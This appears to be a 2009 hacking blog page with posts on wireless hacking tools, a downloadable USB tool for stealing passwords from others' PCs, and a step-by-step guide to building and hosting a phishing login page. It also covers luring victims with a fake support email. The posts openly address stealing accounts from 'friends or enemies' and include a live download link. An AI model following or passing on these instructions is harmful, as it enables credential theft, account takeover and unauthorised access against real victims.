Your Ad Here

Monday, May 4, 2009

Essential Wireless Hacking Tools




Your Ad Here




Website counter






Essential Wireless Hacking Tools,& the most important wireless hacing tools ,here are the most essential tools for wireless hacking ,guys interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities will need a good set of base tools with which to work. Fortunately, there are an abundance of free tools available on the Internet. This list is not meant to be comprehensive in nature but rather to provide some general guidance on recommended tools to build your toolkit.

Finding Wireless Networks:
Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:
Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also
has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.





KismetOne of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.

Attaching to the Found Wireless Network:Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.

Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.




Sunday, May 3, 2009

Hack a PC by USB..


Website counter




Hacking passwords or any information using USB(pendrives).Here is the small tricks guys for stealing information or passwords of ur friends or enemies using pendrives...

Download this software:

http://www.mediafire.com/?f3ddzyenlug

  1. Extract it.
  2. open pcinfo
  3. select all the files and paste it in ur USB(pendrive)
  4. it in the pc u wanna hack...
  5. Open the USB drive, give it 2 sec and and ur job is done...

And now open the dump folder in ur pc and u will have all the info u want...

Hack any gmail,yahoo,msn,orkut,hotmail,facebook or any other account!!!

This is a very simple basic but the quickest trick of all.

It is actually called phishing.
The main concept is that you have to make a page in which the your victim enters his login details. And instead of logging in he actually is SENDING YOU HIS PASSWORD TO YOUR EMAIL!!!

Now let’s learn how to create your very own fake login page.

{1} Open www.jotform.com and Sign Up.

{2} then Login there with your newly registered account.

{3} now click on ‘ Create your first form’.

{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)

{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)

{6} Now Click on ‘Power Tool’ Option (In right hand side…)

{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’

{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.

{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.

{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)

{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.

{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.

{13} Now open Notepad text editor and write the following code their.


NOW YOU HAVE THE HTML CODE WHICH IS TO BE UPLOADED TO SOME SITE OF YOUR OWN .THERE ARE MANY SITES THROUGH WHICH YOU CAN DO THIS LIKE www.piczo.com , www.tripod.com., or you could even use blogger itself!!!

After hosting the page just make your victim login through it and then you will get his password !

But how will you do that? I have an answer for that too! Just make an e-mail id which looks like an official id like googlesupport@gmail.com and send a mail to your victim saying that his /her account will expire if he/she doesn't login through the link you have made .

Becoming a hacker is now easy!!!


Website counter




Becoming a hacker is now easy!!!
All you have to do is go through this site!!!

Also find any software you can need right here in this site!!! FOR FREE!!!!!!